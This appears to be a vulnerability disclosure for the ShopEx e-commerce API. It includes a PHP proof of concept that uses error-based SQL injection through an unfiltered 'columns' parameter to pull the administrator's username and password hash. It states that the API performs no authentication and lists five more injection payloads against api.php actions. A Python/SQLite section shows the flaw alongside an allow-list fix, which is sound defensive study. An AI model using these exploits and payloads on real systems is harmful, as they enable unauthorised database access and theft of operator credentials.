Vulnerable file: \core\api\payment\2.0\api_b2b_2_0_payment_cfg.php
and core\api\payment\1.0\api_b2b_2_0_payment_cfg.php

Line 44: $data['columns'] is passed into the query without any filtering, which leads to SQL injection.
PoC (the columns value is spliced into a SELECT, so the injected tail rewrites the query and the trailing # comments out the original remainder; the floor(rand(0)*2) group-by trick forces a duplicate-key error whose message carries username|userpass of the first sdb_operators row):

<?php
// Error-based SQL injection through the unfiltered columns parameter of
// act=search_payment_cfg_list (api_version=2.0).
set_time_limit(0);
echo 'Test: http://localhost:808' . "\r\n";

// POST body. 0x7c is '|', used as the separator between username and userpass.
$post = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1';
$url  = 'http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);

// The MySQL "Duplicate entry" error in the response contains the extracted credentials.
echo $data;
?>

One more note: the ShopEx API module performs no authentication at all. Any user can call it, so an attacker can use it to add, delete and modify product categories, types, specifications, brands and so on, and where input is filtered improperly it also gives SQL injection.
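The columns flaw above is a column-list injection: the request value becomes part of the SELECT identifier list, and identifiers cannot be bound as prepared-statement parameters, so parameter binding alone does not fix it. The following is an added example, not ShopEx's code, written in Python against an in-memory SQLite database with a constructed two-table schema (only the table names sdb_payment_cfg and sdb_operators come from the PoC; the columns and rows are invented). The query shape SELECT {columns} FROM sdb_payment_cfg WHERE disabled = ... is assumed from the PoC. SQLite has no floor(rand(0)*2) duplicate-key trick, so the demonstration tail reads sdb_operators directly with || and a -- comment; the fix shown is an allow-list built from the table's real column names plus a bound parameter for the value.

```python
import re
import sqlite3

# Constructed stand-in schema; the real ShopEx tables and their columns are not on
# the page, only the names sdb_payment_cfg and sdb_operators appear in the PoC.
SCHEMA = """
CREATE TABLE sdb_payment_cfg (id INTEGER, app_display_name TEXT, disabled INTEGER);
CREATE TABLE sdb_operators (username TEXT, userpass TEXT);
INSERT INTO sdb_payment_cfg VALUES (1, 'alipay', 1), (2, 'tenpay', 0);
INSERT INTO sdb_operators VALUES ('admin', 'fakehash');
"""

# SQLite rendering of the PoC's concat(username,0x7c,userpass) ... # tail:
# || replaces concat() and -- replaces MySQL's # comment.
INJECTED_COLUMNS = "username || '|' || userpass FROM sdb_operators --"

TABLE = "sdb_payment_cfg"
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_payment_cfg_vulnerable(conn, columns, disabled):
    """Assumed shape of the flawed query: both request fields are spliced in."""
    sql = f"SELECT {columns} FROM {TABLE} WHERE disabled = {disabled}"
    return conn.execute(sql).fetchall()


def table_columns(conn, table):
    """Real column names of the table, the only trustworthy allow-list source."""
    return {row[1] for row in conn.execute(f"PRAGMA table_info({table})")}


def validate_columns(conn, columns, table=TABLE):
    """Return a column list that is safe to splice, or raise ValueError.

    Identifiers cannot be bound as ? parameters, so the defence is to accept
    only '*' or a comma-separated list whose every item is a plain identifier
    that actually exists in the table.
    """
    requested = [c.strip() for c in columns.split(",")]
    if requested == ["*"]:
        return "*"
    allowed = table_columns(conn, table)
    for col in requested:
        if not IDENT.match(col) or col not in allowed:
            raise ValueError(f"column not allowed: {col!r}")
    return ", ".join(requested)


def search_payment_cfg_hardened(conn, columns, disabled):
    """Allow-listed identifiers for the column list, bound parameter for the value."""
    cols = validate_columns(conn, columns)
    sql = f"SELECT {cols} FROM {TABLE} WHERE disabled = ?"
    return conn.execute(sql, (int(disabled),)).fetchall()


def is_rejected(conn, columns):
    """True if the hardened path refuses this column list."""
    try:
        validate_columns(conn, columns)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("vulnerable, honest request:", search_payment_cfg_vulnerable(db, "app_display_name", 1))
    print("vulnerable, injected tail :", search_payment_cfg_vulnerable(db, INJECTED_COLUMNS, 1))
    print("hardened, honest request  :", search_payment_cfg_hardened(db, "id, app_display_name", 1))
    print("hardened, injected tail   :", is_rejected(db, INJECTED_COLUMNS))
```

The vulnerable path returns admin|fakehash from a table the endpoint was never meant to read; the hardened path rejects the same value before any SQL is built, and would equally reject a column name from another table, since the allow-list is derived from sdb_payment_cfg itself rather than from a hand-maintained list.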
Injection 1 (error-based, leaks version()):
http://www.0day5.com/api.php
POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#

Injection 2 (the name field inside the datas JSON):
http://www.0day5.com/shopex/api.php
act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"}

Injection 3 (probe: the malformed spec_id shows the parameter reaches the query unfiltered):
http://www.0day5.com/shopex/api.php
act=get_spec_single&api_version=3.1&spec_id=1 xxx

Injection 4 (probe: malformed order_id):
http://www.0day5.com/shopex/api.php
act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1&currency=1

Injection 5 (the same unfiltered columns parameter, in a different action):
http://www.0day5.com/shopex/api.php
act=search_dly_h_area&return_data=string&columns=xxxxx